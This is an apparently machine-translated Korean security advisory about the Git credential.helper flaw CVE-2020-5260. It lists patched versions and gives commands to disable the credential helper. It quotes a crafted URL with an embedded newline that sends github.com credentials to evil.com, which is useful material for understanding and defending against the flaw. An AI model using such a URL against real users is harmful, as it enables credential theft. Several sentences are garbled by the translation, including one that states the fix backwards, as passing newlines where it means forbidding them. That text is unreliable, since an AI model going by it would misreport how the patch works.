Git 자격 증명 유출 취약점

게시됨 분산 소스 제어 시스템 Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 및 2.17.4의 수정 릴리스 제거한 취약점 (CVE-2020-5260) 처리기에서 "자격 증명.도우미"로 인해 git 클라이언트가 개행 문자가 포함된 특별히 형식화된 URL을 사용하여 저장소에 액세스할 때 자격 증명이 잘못된 호스트로 전송됩니다. 이 취약점은 다른 호스트의 자격 증명이 공격자가 제어하는 ​​서버로 전송되도록 준비하는 데 사용될 수 있습니다.

"https://evil.com?%0ahost=github.com/"과 같은 URL을 지정하면 호스트 evil.com에 연결할 때 자격 증명 처리기가 github.com에 대해 지정된 인증 매개 변수를 전달합니다. 하위 모듈에 대한 URL 처리를 포함하여 "git clone"과 같은 작업을 수행할 때 문제가 발생합니다. 예를 들어 "git submodule update"는 저장소의 .gitmodules 파일에 지정된 URL을 자동으로 처리합니다. 이 취약성은 개발자가 URL을 확인하지 않고 저장소를 복제하는 상황(예: 하위 모듈 작업 시)이나 자동 작업을 수행하는 시스템(예: 패키지 빌드 스크립트)에서 가장 위험합니다.

새 버전의 취약점을 차단하려면 금지 자격 증명 교환 프로토콜을 통해 전송되는 모든 값에 개행 문자를 전달합니다. 배포판의 경우 페이지에서 패키지 업데이트 릴리스를 추적할 수 있습니다. 데비안, Ubuntu, RHEL, 수세/오픈수세, 페도라, 아치, FreeBSD의.

문제를 차단하는 해결 방법으로 추천 공개 저장소에 액세스할 때 credential.helper를 사용하지 말고 확인되지 않은 저장소가 있는 "--recurse-submodules" 모드에서 "git clone"을 사용하지 마십시오. credential.helper 핸들러를 완전히 비활성화하려면 보존 그리고 다음에서 비밀번호를 검색합니다. 은닉처, 보호됨 금고 또는 비밀번호가 포함된 파일인 경우 다음 명령을 사용할 수 있습니다.

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

출처 : opennet.ru